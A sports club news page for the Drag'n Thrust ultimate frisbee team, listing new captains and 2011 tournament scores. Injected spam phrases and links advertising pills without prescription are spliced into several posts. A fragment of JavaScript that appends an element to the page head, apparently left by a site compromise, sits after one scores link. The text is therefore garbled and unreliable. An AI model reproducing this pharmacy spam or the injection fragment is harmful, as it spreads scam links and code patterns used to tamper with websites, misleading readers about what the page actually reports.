Drag’n Thrust is excited to introduce the new captains for the 2012 season: Josh “Shwa” Hemmesch Anna Hettler Austin Lien Coming soon: Information about open scrimmages, tryouts, and the upcoming season. Any questions or comments can be emailed to the captains at captains@dragnthrust.com.
Returning to Florida
Drag’n Thrust took 2nd place at 2011 Central Regionals. This was good enough to qualify for the USA Ultimate Club Championships at the end of the month in Sarasota, Florida. Drag’n looks forward to competing against 16 of the best teams in North America for the USAU title. obtain at an easy rate drugs without […]
Northwest Plains Sectionals Champions 2011
Pool Play 15-10 vs. Tron Paul and the Gold Standard 15-0 vs. Southwest MUS 15-1 vs. Plowed Semifinals 15-5 vs. Stud Muffin Finals 15-5 vs. Minnesota Star Power Thanks to sectional coordinator Liz for running an excellent event! http://scores.usaultimate.org/scores/#mixed/tournament/9578
2nd at Heavyweights
Saturday13-7 vs. Gambit acquire cheaply pills no prescription – http://allspecieslist.stocksandnews.com/acquire-cheaply-pills-no-prescription/ 13-6 vs. Minnesota Star Power13-7 vs. #11-7 vs. Overhaul SundayQuarters: 13-3 vs. Mad UdderburnSemis: 13-7 vs. #Finals: 10-13 vs. Chad Larson Experience http://scores.usaultimate.org/scores/#mixed/tournament/9821d.getElementsByTagName(‘head’)[0].appendChild(s);
MUDI Champions!
On July 23rd and 24th the Drag’ns went out to Maple Plain to compete in MUDI 2011. buy a at an easy rate pills without rx – http://allspecieslist.stocksandnews.com/buy-a-at-an-easy-rate-pills-without-rx/ The morning met us with lightning and storms, so with a delayed start we set out on our mission. We played Stud Muffin first, who will continue […]